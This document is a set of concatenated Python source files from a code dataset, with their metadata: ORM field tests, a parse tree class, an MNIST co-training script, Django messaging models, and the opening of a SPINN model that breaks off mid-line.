test_table = gen_table(TestTable)\n\n with pytest.raises(ValueError) as exc:\n test_table.create(enum='baz')\n\n assert exc.value.args[0] == 'Invalid Enum Value \"baz\"'\n\n\ndef test_direction(gen_table):\n class TestTable(peewee.Model):\n direction = db_orm.DirectionField()\n\n test_table = gen_table(TestTable)\n test_table.create(direction=('title', 'text'))\n res = test_table.select(test_table).execute().next()\n\n assert res.direction == ('title', 'text')\n assert res.direction.title 
== 'title'\n assert res.direction.text == 'text'\n\n\ndef test_array_of_directions(gen_table):\n class TestTable(peewee.Model):\n directions = db_orm.ArrayField(db_orm.DirectionField)\n\n test_table = gen_table(TestTable)\n\n directions = [('title 1', 'text 1'), ('title 2', 'text 2')]\n test_table.create(directions=directions)\n res = test_table.select(test_table).execute().next()\n\n assert res.directions[0].title == directions[0][0]\n assert res.directions[0].text == directions[0][1]\n assert res.directions[1].title == directions[1][0]\n assert res.directions[1].text == directions[1][1]\n\n\ndef test_array_of_ints(gen_table):\n class TestTable(peewee.Model):\n integers = db_orm.ArrayField(peewee.IntegerField)\n\n test_table = gen_table(TestTable)\n\n test_table.create(integers=[1, 2, 3])\n res = test_table.select(test_table).execute().next()\n\n assert res.integers == [1, 2, 3]\n\n\ndef test_array_of_chars(gen_table):\n class TestTable(peewee.Model):\n chars = db_orm.ArrayField(peewee.CharField)\n\n test_table = gen_table(TestTable)\n\n test_table.create(chars=['foo', 'bar'])\n res = test_table.select(test_table).execute().next()\n\n assert res.chars == ['foo', 'bar']\n", "sub_path": "lasagna/tests/db/test_orm.py", "file_name": "test_orm.py", "file_ext": "py", "file_size_in_byte": 2214, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "peewee.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.EnumField", "line_number": 9, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 9, "usage_type": "name"}, {"api_name": "peewee.Model", "line_number": 19, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.EnumField", "line_number": 20, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 20, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 24, "usage_type": "call"}, {"api_name": "peewee.Model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.DirectionField", "line_number": 32, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 32, "usage_type": "name"}, {"api_name": "peewee.Model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 45, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 45, "usage_type": "name"}, {"api_name": "lasagna.db.orm.DirectionField", "line_number": 45, "usage_type": "attribute"}, {"api_name": "peewee.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 61, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 61, "usage_type": "name"}, {"api_name": "peewee.IntegerField", "line_number": 61, "usage_type": "attribute"}, {"api_name": "peewee.Model", "line_number": 72, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 73, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 73, "usage_type": "name"}, {"api_name": "peewee.CharField", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "331401670", "text": "from .parse_tree_node import ParseTreeNode\nfrom graphviz import Digraph\n\nimport sys\nclass ParseTree (object):\n def __init__(self):\n self.root = ParseTreeNode(0,\"ROOT\",\"ROOT\",\"ROOT\", None)\n self.root.token_type = \"ROOT\"\n self.all_nodes = [self.root]\n self.deleted_nodes = []\n\n def build_node(self, entry):\n if len(self.root.children) == 0:\n node = 
ParseTreeNode(int(entry[0]), entry[1],entry[2], entry[5], self.root)\n self.root.children.append(node)\n self.all_nodes.append(node)\n return True\n else:\n l = [self.root]\n while len(l) != 0:\n parent = l.pop(0)\n\n if parent.word_order == int(entry[3]):\n node = ParseTreeNode(int(entry[0]), entry[1],entry[2],entry[5], parent)\n parent.children.append(node)\n self.all_nodes.append(node)\n return True\n\n for child in parent.children:\n l += [child]\n return False\n\n\n def search_node_by_order(self, order):\n for node in self.all_nodes:\n if node.word_order == order:\n return node\n return None\n\n def search_node_by_id(self, id):\n for node in self.all_nodes:\n if node.node_id == id:\n return node\n return None\n\n def delete_node(self, node):\n parent = node.parent\n node.parent = None\n position = 0\n try:\n position = parent.children.index(node)\n except ValueError:\n position = -1\n\n if position == -1:\n return\n\n parent.children.remove(node)\n if node.left_rel != '' and len(node.children) > 0:\n node.children[0].left_rel = node.left_rel\n\n \n for i in range(len(node.children)):\n \n node.children[i].parent = parent\n parent.children.insert(position+i, node.children[i])\n\n self.all_nodes.remove(node)\n\n if node.token_type != \"QT\":\n self.deleted_nodes.append(node)\n\n def __repr__(self):\n result = ''\n node_list = [self.root]\n level_list = [0]\n\n while len(node_list) != 0:\n cur_node = node_list.pop(len(node_list) - 1)\n cur_level = level_list.pop(len(level_list) - 1)\n\n result += cur_level*\" \"\n result += '(' + str(cur_node.node_id) + ')'\n\n result += cur_node.label + '\\n'\n\n tam = len(cur_node.children)\n for i in range(tam):\n nxt = cur_node.children[tam -i - 1]\n node_list.append(nxt)\n level_list.append(cur_level + 1)\n return result\n\n def show(self):\n dot = Digraph(graph_attr={'size': '5'})\n\n def graphviz_node_id(node):\n if node.parent is not None:\n return f'{node.parent}.{node}'\n return f'{0}.{node}'\n\n\n def create_graphbiz(dot,root):\n dot.node(graphviz_node_id(root),label=root.label)\n for child in root.children:\n dot.edge(graphviz_node_id(root),graphviz_node_id(child))\n create_graphbiz(dot,child)\n\n create_graphbiz(dot,self.root)\n return dot\n", "sub_path": "nalir/data_structure/parse_tree.py", "file_name": "parse_tree.py", "file_ext": "py", "file_size_in_byte": 3285, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "parse_tree_node.ParseTreeNode", "line_number": 7, "usage_type": "call"}, {"api_name": "parse_tree_node.ParseTreeNode", "line_number": 14, "usage_type": "call"}, {"api_name": "parse_tree_node.ParseTreeNode", "line_number": 24, "usage_type": "call"}, {"api_name": "graphviz.Digraph", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "71200954", "text": "\"\"\"\n2021/3/9\ntrain mnist decoupling\n\"\"\"\nimport argparse\nimport os\nimport time\n\n# from torchvision.models import resnet18, resnet34, resnet50\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, utils\n\nfrom models.models import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-name', type=str, help='project name', default='mnist_decoupling')\nparser.add_argument('-dataset_path', type=str, help='relative path of dataset', default='../dataset')\nparser.add_argument('-batch_size', type=int, help='batch size', default=64)\nparser.add_argument('-lr', type=float, 
help='learning rate', default=0.01)\nparser.add_argument('-epochs', type=int, help='training epochs', default=100)\nparser.add_argument('-log_dir', type=str, help='log dir', default='output')\nargs = parser.parse_args()\n\n\ndef create_dataloader():\n    transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize(mean=(0.1307,), std=(0.3081,))\n    ])\n\n    # load dataset\n    train_set = datasets.MNIST(\n        args.dataset_path, train=True, transform=transform, download=True)\n    test_set = datasets.MNIST(\n        args.dataset_path, train=False, transform=transform, download=False)\n\n    # split train set into train/val sets\n    train_set, val_set = torch.utils.data.random_split(train_set, [\n        50000, 10000])\n\n    # generate DataLoader\n    train_loader = DataLoader(\n        train_set, batch_size=args.batch_size, shuffle=True)\n\n    val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False)\n\n    test_loader = DataLoader(\n        test_set, batch_size=args.batch_size, shuffle=False)\n\n    return train_loader, val_loader, test_loader\n\n\ndef train(model1, model2, train_loader, optimizer1, optimizer2, epoch, device, train_loss_lst, train_acc_lst):\n    model1.train()  # Set the module in training mode\n    model2.train()\n    correct1 = 0\n    correct2 = 0\n    train_loss1 = 0\n    train_loss2 = 0\n    for batch_idx, (inputs, labels) in enumerate(train_loader):\n        inputs, labels = inputs.to(device), labels.to(device)\n        outputs1 = model1(inputs)\n        outputs2 = model2(inputs)\n\n        pred1 = outputs1.max(1, keepdim=True)[1]\n        pred2 = outputs2.max(1, keepdim=True)[1]\n        correct1 += pred1.eq(labels.view_as(pred1)).sum().item()\n        correct2 += pred2.eq(labels.view_as(pred2)).sum().item()\n\n        index = []\n        for i in range(inputs.size(0)):\n            if pred1[i] != pred2[i]:\n                index.append(i)\n\n        if len(index) == 0:\n            # both networks agree on every sample in this batch; skip the\n            # decoupled update (mean() over an empty selection would be NaN)\n            continue\n\n        criterion = nn.CrossEntropyLoss(reduction='none')\n        loss1 = criterion(outputs1, labels)\n        loss2 = criterion(outputs2, labels)\n\n        loss1 = torch.index_select(loss1, dim=-1, index=torch.tensor(index, dtype=torch.int64).to(device)).mean()\n        loss2 = torch.index_select(loss2, dim=-1, index=torch.tensor(index, dtype=torch.int64).to(device)).mean()\n\n        optimizer1.zero_grad()\n        optimizer2.zero_grad()\n        loss1.backward()\n        loss2.backward()\n        optimizer1.step()\n        optimizer2.step()\n        train_loss1 += loss1.item()\n        train_loss2 += loss2.item()\n\n        # show batch0 dataset\n        if batch_idx == 0 and epoch == 0:\n            fig = plt.figure()\n            inputs = inputs.detach().cpu()  # convert to cpu\n            grid = utils.make_grid(inputs)\n            plt.imshow(grid.numpy().transpose((1, 2, 0)))\n            plt.savefig(os.path.join(output_path, 'batch0.png'))\n            plt.close(fig)\n\n        # print train loss and accuracy\n        if (batch_idx + 1) % 100 == 0:\n            print('Train Epoch: {} [{}/{} ({:.1f}%)]  Loss1: {:.6f}, Loss2: {:.6f}'\n                  .format(epoch, batch_idx * len(inputs), len(train_loader.dataset),\n                          100. 
* batch_idx / len(train_loader), loss1.item(), loss2.item()))\n\n # record loss and accuracy\n train_loss1 /= len(train_loader) # must divide iter num\n train_loss_lst.append(train_loss1)\n train_acc_lst.append(correct1 / len(train_loader.dataset))\n return train_loss_lst, train_acc_lst\n\n\ndef validate(model1, model2, val_loader, device, val_loss_lst, val_acc_lst):\n model1.eval() # Set the module in evaluation mode\n model2.eval()\n val_loss1 = 0\n val_loss2 = 0\n correct1 = 0\n correct2 = 0\n\n # no need to calculate gradients\n with torch.no_grad():\n for data, target in val_loader:\n data, target = data.to(device), target.to(device)\n output1 = model1(data)\n output2 = model2(data)\n\n criterion = nn.CrossEntropyLoss()\n val_loss1 += criterion(output1, target).item()\n val_loss2 += criterion(output2, target).item()\n\n # find index of max prob\n pred1 = output1.max(1, keepdim=True)[1]\n pred2 = output2.max(1, keepdim=True)[1]\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print val loss and accuracy\n val_loss1 /= len(val_loader)\n print('\\nVal set: Average loss1: {:.6f}, Accuracy1: {}/{} ({:.2f}%)'\n .format(val_loss1, correct1, len(val_loader.dataset),\n 100. * correct1 / len(val_loader.dataset)))\n val_loss2 /= len(val_loader)\n print('Val set: Average loss2: {:.6f}, Accuracy2: {}/{} ({:.2f}%)\\n'\n .format(val_loss2, correct2, len(val_loader.dataset),\n 100. * correct2 / len(val_loader.dataset)))\n\n # record loss and accuracy\n val_loss_lst.append(val_loss1)\n val_acc_lst.append(correct1 / len(val_loader.dataset))\n return val_loss_lst, val_acc_lst\n\n\ndef test(model1, model2, test_loader, device):\n model1.eval() # Set the module in evaluation mode\n model2.eval()\n test_loss1 = 0\n test_loss2 = 0\n correct1 = 0\n correct2 = 0\n # no need to calculate gradients\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output1 = model1(data)\n output2 = model2(data)\n\n criterion = nn.CrossEntropyLoss()\n test_loss1 += criterion(output1, target).item()\n test_loss2 += criterion(output2, target).item()\n\n # find index of max prob\n pred1 = output1.max(1, keepdim=True)[1]\n pred2 = output2.max(1, keepdim=True)[1]\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print test loss and accuracy\n test_loss1 /= len(test_loader.dataset)\n print('Test set: Average loss1: {:.6f}, Accuracy1: {}/{} ({:.2f}%)'\n .format(test_loss1, correct1, len(test_loader.dataset),\n 100. * correct1 / len(test_loader.dataset)))\n test_loss2 /= len(test_loader.dataset)\n print('Test set: Average loss2: {:.6f}, Accuracy2: {}/{} ({:.2f}%)\\n'\n .format(test_loss2, correct2, len(test_loader.dataset),\n 100. 
* correct2 / len(test_loader.dataset)))\n\n\nif __name__ == \"__main__\":\n torch.manual_seed(0)\n # create output folder\n now = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime())\n output_path = os.path.join(args.log_dir, args.name + now)\n os.makedirs(output_path)\n\n train_loader, val_loader, test_loader = create_dataloader() # get data loader\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model1 = MNISTNet().to(device)\n model2 = MNISTNet().to(device)\n # model = resnet18(num_classes=32).to(device)\n\n optimizer1 = optim.SGD(model1.parameters(), lr=args.lr, momentum=0.9)\n optimizer2 = optim.SGD(model2.parameters(), lr=args.lr, momentum=0.9)\n\n train_loss_lst, val_loss_lst = [], []\n train_acc_lst, val_acc_lst = [], []\n\n # main loop(train,val,test)\n for epoch in range(args.epochs):\n train_loss_lst, train_acc_lst = train(model1, model2, train_loader, optimizer1, optimizer2,\n epoch, device, train_loss_lst, train_acc_lst)\n val_loss_lst, val_acc_lst = validate(\n model1, model2, val_loader, device, val_loss_lst, val_acc_lst)\n\n # modify learning rate\n if epoch in [40, 60, 80]:\n args.lr *= 0.1\n optimizer1 = optim.SGD(model1.parameters(), lr=args.lr, momentum=0.9)\n optimizer2 = optim.SGD(model2.parameters(), lr=args.lr, momentum=0.9)\n\n test(model1, model2, test_loader, device)\n\n # plot loss and accuracy curve\n fig = plt.figure('Loss and acc')\n plt.plot(range(args.epochs), train_loss_lst, 'g', label='train loss')\n plt.plot(range(args.epochs), val_loss_lst, 'k', label='val loss')\n plt.plot(range(args.epochs), train_acc_lst, 'r', label='train acc')\n plt.plot(range(args.epochs), val_acc_lst, 'b', label='val acc')\n plt.grid(True)\n plt.xlabel('epoch')\n plt.ylabel('acc-loss')\n plt.legend(loc=\"upper right\")\n plt.savefig(os.path.join(output_path, 'loss_acc.png'))\n plt.show()\n plt.close(fig)\n\n # save model\n torch.save(model1.state_dict(), os.path.join(output_path, args.name + \"_model1.pth\"))\n torch.save(model2.state_dict(), os.path.join(output_path, args.name + \"_model2.pth\"))\n", "sub_path": "decoupling/train_mnist_decoupling.py", "file_name": "train_mnist_decoupling.py", "file_ext": "py", "file_size_in_byte": 9281, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 29, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", 
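The script above implements decoupling-style co-training: two identical networks see the same batch but only backpropagate on the examples where their argmax predictions disagree. A minimal sketch of that update rule, assuming `model1`/`model2` are any classifiers over the same label space (the function name and signature are illustrative, not from the record):

```python
# Minimal "update on disagreement" step (decoupling when to update from
# how to update). model1/model2: nn.Module classifiers; opt1/opt2: their optimizers.
import torch.nn as nn

def disagreement_step(model1, model2, opt1, opt2, inputs, labels):
    out1, out2 = model1(inputs), model2(inputs)
    disagree = out1.argmax(dim=1) != out2.argmax(dim=1)  # boolean mask, shape (batch,)
    if not disagree.any():
        # guard: the mean over an empty selection is NaN
        return 0.0
    criterion = nn.CrossEntropyLoss(reduction='none')
    loss1 = criterion(out1, labels)[disagree].mean()
    loss2 = criterion(out2, labels)[disagree].mean()
    opt1.zero_grad(); opt2.zero_grad()
    loss1.backward(); loss2.backward()
    opt1.step(); opt2.step()
    return loss1.item() + loss2.item()
```

The empty-disagreement guard mirrors the fix applied in the training loop above.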
"line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.index_select", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 98, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 193, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 195, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 201, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 207, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path", "line_number": 238, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path", "line_number": 243, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 244, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 244, "usage_type": "call"}, {"api_name": "os.path", "line_number": 244, "usage_type": "attribute"}]} +{"seq_id": "274395734", "text": "import uuid\n\nfrom django.conf import settings\nfrom django.db import models\n\n\nclass MessageManager(models.Manager):\n\n def inbox_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages received by the given user and are not\n marked as deleted.\n \"\"\"\n return self.filter(\n recipient=user,\n recipient_deleted_at__isnull=True,\n )\n\n def outbox_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages sent by the given user and are not\n marked as deleted.\n \"\"\"\n return self.filter(\n sender=user,\n sender_deleted_at__isnull=True,\n )\n\n def trash_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages that were either received or sent by the given\n user and are marked as deleted.\n \"\"\"\n return self.filter(\n recipient=user,\n recipient_deleted_at__isnull=False,\n ) | self.filter(\n sender=user,\n sender_deleted_at__isnull=False,\n )\n\n\nclass Message(models.Model):\n \"\"\"\n A private message from user to user\n \"\"\"\n id = models.UUIDField(default=uuid.uuid4, primary_key=True, editable=False)\n subject = models.CharField(max_length=140)\n body = models.TextField()\n sender = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='sent_messages', on_delete=models.SET_NULL, null=True)\n recipient = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='received_messages', null=True, blank=True, on_delete=models.SET_NULL)\n parent_msg = models.ForeignKey('self', related_name='next_messages', null=True, blank=True, 
on_delete=models.SET_NULL)\n sent_at = models.DateTimeField(null=True, blank=True)\n read_at = models.DateTimeField(null=True, blank=True)\n replied_at = models.DateTimeField(null=True, blank=True)\n sender_deleted_at = models.DateTimeField(null=True, blank=True)\n recipient_deleted_at = models.DateTimeField(null=True, blank=True)\n\n objects = MessageManager()\n\n def new(self):\n \"\"\"returns whether the recipient has read the message or not\"\"\"\n if self.read_at is not None:\n return False\n return True\n\n def replied(self):\n \"\"\"returns whether the recipient has written a reply to this message\"\"\"\n if self.replied_at is not None:\n return True\n return False\n\n def __str__(self):\n return self.subject\n\n class Meta:\n ordering = ['-sent_at']\n verbose_name = \"Message\"\n verbose_name_plural = \"Messages\"\n", "sub_path": "drf_messages/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Manager", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.UUIDField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.db.models.CharField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 55, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 56, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": 
"django.db.models.DateTimeField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 60, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "600815973", "text": "import itertools\n\nimport numpy as np\nfrom spinn import util\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom spinn.util.blocks import BaseSentencePairTrainer, Reduce\nfrom spinn.util.blocks import LSTMState, Embed, MLP, Linear, LSTM\nfrom spinn.util.blocks import reverse_tensor\nfrom spinn.util.blocks import bundle, unbundle, to_cpu, to_gpu, treelstm, lstm\nfrom spinn.util.blocks import get_h, get_c\nfrom spinn.util.misc import Args, Vocab, Example\nfrom spinn.util.blocks import HeKaimingInitializer\n\n\nT_SKIP = 2\nT_SHIFT = 0\nT_REDUCE = 1\n\n\n\"\"\"\n\nMissing Features\n\n- [ ] Optionally use cell when predicting transitions.\n\n\n\"\"\"\n\n\nclass SentencePairTrainer(BaseSentencePairTrainer): pass\n\n\nclass SentenceTrainer(SentencePairTrainer): pass\n\n\nclass Tracker(nn.Module):\n\n def __init__(self, size, tracker_size, lateral_tracking=True):\n super(Tracker, self).__init__()\n\n # Initialize layers.\n self.buf = Linear()(size, 4 * tracker_size, bias=False)\n self.stack1 = Linear()(size, 4 * tracker_size, bias=False)\n self.stack2 = Linear()(size, 4 * tracker_size, bias=False)\n\n if lateral_tracking:\n self.lateral = Linear(initializer=HeKaimingInitializer)(tracker_size, 4 * tracker_size)\n else:\n self.transform = Linear(initializer=HeKaimingInitializer)(4 * tracker_size, tracker_size)\n\n self.lateral_tracking = lateral_tracking\n self.state_size = tracker_size\n\n self.reset_state()\n\n def reset_state(self):\n self.c = self.h = None\n\n def forward(self, top_buf, top_stack_1, top_stack_2):\n tracker_inp = self.buf(top_buf.h)\n tracker_inp += self.stack1(top_stack_1.h)\n tracker_inp += self.stack2(top_stack_2.h)\n\n batch_size = tracker_inp.size(0)\n\n if self.lateral_tracking:\n if self.h is not None:\n tracker_inp += self.lateral(self.h)\n if self.c is None:\n self.c = to_gpu(Variable(torch.from_numpy(\n np.zeros((batch_size, self.state_size),\n dtype=np.float32)),\n volatile=tracker_inp.volatile))\n\n # Run tracking lstm.\n self.c, self.h = lstm(self.c, tracker_inp)\n\n return self.h, self.c\n else:\n outp = self.transform(tracker_inp)\n return outp, None\n\n @property\n def states(self):\n return unbundle((self.c, self.h))\n\n @states.setter\n def states(self, state_iter):\n if state_iter is not None:\n state = bundle(state_iter)\n self.c, self.h = state.c, state.h\n\n\nclass SPINN(nn.Module):\n\n def __init__(self, args, vocab, use_skips=False):\n super(SPINN, self).__init__()\n\n # Optional debug mode.\n self.debug = False\n\n self.transition_weight = args.transition_weight\n self.use_skips = use_skips\n\n # Reduce function for semantic composition.\n self.reduce = Reduce(args.size, args.tracker_size, args.use_tracking_in_composition)\n if args.tracker_size is not None:\n self.tracker = Tracker(args.size, args.tracker_size, args.lateral_tracking)\n if args.transition_weight is not None:\n # TODO: Might be interesting to try a different network here.\n self.transition_net = nn.Linear(args.tracker_size, 3 if 